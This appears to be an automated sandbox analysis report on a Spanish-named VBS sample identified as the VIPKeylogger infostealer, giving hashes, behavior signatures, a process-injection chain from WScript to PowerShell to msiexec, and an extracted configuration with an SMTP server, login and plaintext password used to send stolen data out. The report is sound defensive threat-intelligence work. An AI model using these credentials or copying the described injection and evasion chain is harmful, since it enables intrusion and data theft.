Analysis
max time kernel: 70s
max time network: 72s
platform: windows7_x64
resource: win7-20240708-en
resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
submitted: 22-10-2024 16:40
Static task: static1
Behavioral task: behavioral1
  Sample: NUEVO ORDEN.vbs
  Resource: win7-20240708-en
Behavioral task: behavioral2
  Sample: NUEVO ORDEN.vbs
  Resource: win10v2004-20241007-en
General
Target: NUEVO ORDEN.vbs
Size: 525KB
MD5: 2358bb1bd8cf609df9f1917cf4224194
SHA1: 45e0ca20b16c048979d95b59f40475f8fa282e32
SHA256: 982fc9bb4315f9e7114479b0a684873cbdc9e99ed75d96a342fd46235f59e84e
SHA512: c2c0e324c07f027edb5e6c34ce368b7d3387fddf6078e5e17c80efa9211381ff58dc27acc22511d0d9f0775b08a43eabfbd7a00061d9f6a3689d3c07a23e9230
SSDEEP: 6144:By/7hX57oFbgZQmRmM0rdGqqgLpjDLkB8Gj+xJ9HQ5/vyGVi4dAMuUnhbeDLttD6:kyRgiYgqSjDoB4x7w5XLduIeD53Vgzeg
Malware Config
Extracted family: vipkeylogger
Protocol: smtp
Host: smtp.ionos.es
Port: 587
Username: [email protected]
Password: 1446010
Email To: [email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C#; it resembles SnakeKeylogger, which was first found in 2020.
-
Blocklisted process makes network request 9 IoCs
Processes: powershell.exe, msiexec.exe
flow  pid   process
5     2328  powershell.exe
7     2328  powershell.exe
9     3036  msiexec.exe
11    3036  msiexec.exe
13    3036  msiexec.exe
15    3036  msiexec.exe
16    3036  msiexec.exe
18    3036  msiexec.exe
20    3036  msiexec.exe
-
Processes: powershell.exe, powershell.exe
pid   process
2328  powershell.exe
2748  powershell.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow  ioc
17    checkip.dyndns.org
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes: msiexec.exe
pid   process
3036  msiexec.exe
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes: powershell.exe, msiexec.exe
pid   process
2748  powershell.exe
3036  msiexec.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes: powershell.exe, msiexec.exe
description  ioc                                                           process
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  msiexec.exe
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes: powershell.exe, powershell.exe, msiexec.exe
pid   process
2328  powershell.exe
2748  powershell.exe
2748  powershell.exe
3036  msiexec.exe
-
Suspicious behavior: MapViewOfSection 1 IoCs
Processes: powershell.exe
pid   process
2748  powershell.exe
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes: powershell.exe, powershell.exe, msiexec.exe
description              pid   process
Token: SeDebugPrivilege  2328  powershell.exe
Token: SeDebugPrivilege  2748  powershell.exe
Token: SeDebugPrivilege  3036  msiexec.exe
-
Suspicious use of WriteProcessMemory 11 IoCs
Processes: WScript.exe, powershell.exe
description                        pid   process         target process
PID 2840 wrote to memory of 2328   2840  WScript.exe     powershell.exe
PID 2840 wrote to memory of 2328   2840  WScript.exe     powershell.exe
PID 2840 wrote to memory of 2328   2840  WScript.exe     powershell.exe
PID 2748 wrote to memory of 3036   2748  powershell.exe  msiexec.exe
PID 2748 wrote to memory of 3036   2748  powershell.exe  msiexec.exe
PID 2748 wrote to memory of 3036   2748  powershell.exe  msiexec.exe
PID 2748 wrote to memory of 3036   2748  powershell.exe  msiexec.exe
PID 2748 wrote to memory of 3036   2748  powershell.exe  msiexec.exe
PID 2748 wrote to memory of 3036   2748  powershell.exe  msiexec.exe
PID 2748 wrote to memory of 3036   2748  powershell.exe  msiexec.exe
PID 2748 wrote to memory of 3036   2748  powershell.exe  msiexec.exe
Processes
-
C:\Windows\System32\WScript.exe (tree depth 1)
Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NUEVO ORDEN.vbs"
- Suspicious use of WriteProcessMemory
PID: 2840
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (tree depth 2)
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<heavily obfuscated PowerShell script, several KB, not reproduced here>"
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 2328
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (tree depth 1)
Command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<heavily obfuscated PowerShell script, several KB, not reproduced here>"
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 2748
-
C:\Windows\SysWOW64\msiexec.exe (tree depth 2)
Command line: "C:\Windows\SysWOW64\msiexec.exe"
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 3036
MITRE ATT&CK Enterprise v15
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7L21292GINPGT8Z2L69A.temp
Filesize: 7KB
MD5: 18b7db5ead2014a336bbd513a7935a93
SHA1: 0e6af9ad08db6a8cb0d6d23ce9792612a65fdcb4
SHA256: 95ed4c306fbe11cdeacb31afdce49cd5554142909a95499402bcb0e3ef5c8c37
SHA512: 64c1aa0022a528708ce93f241fca2c0f0bb0e1f0d3945d8365b902c473917bdc8c7a34fb3614d4ff8bbc70cce67659d0b0f554edbc26f8524eb86ede1f5b4c60
-
Filesize: 460KB
MD5: 15d4bf8d1435c92eafc43ebdff22b873
SHA1: 18a5e9c68c654584e41ddda35c8c1a7e8ea2e13a
SHA256: ecc8d18d98910379300d492a98f573e56ca9daafd3b1cd52ddffd44c175832ce
SHA512: 463ca3c56eacd94dd062c048e630a14d7d89da4b16e589126357f92c32c0d42abdc0d53f59fa62ecebcee7703687b5cf75fe8a9e0dd8629745a5f6134015e41c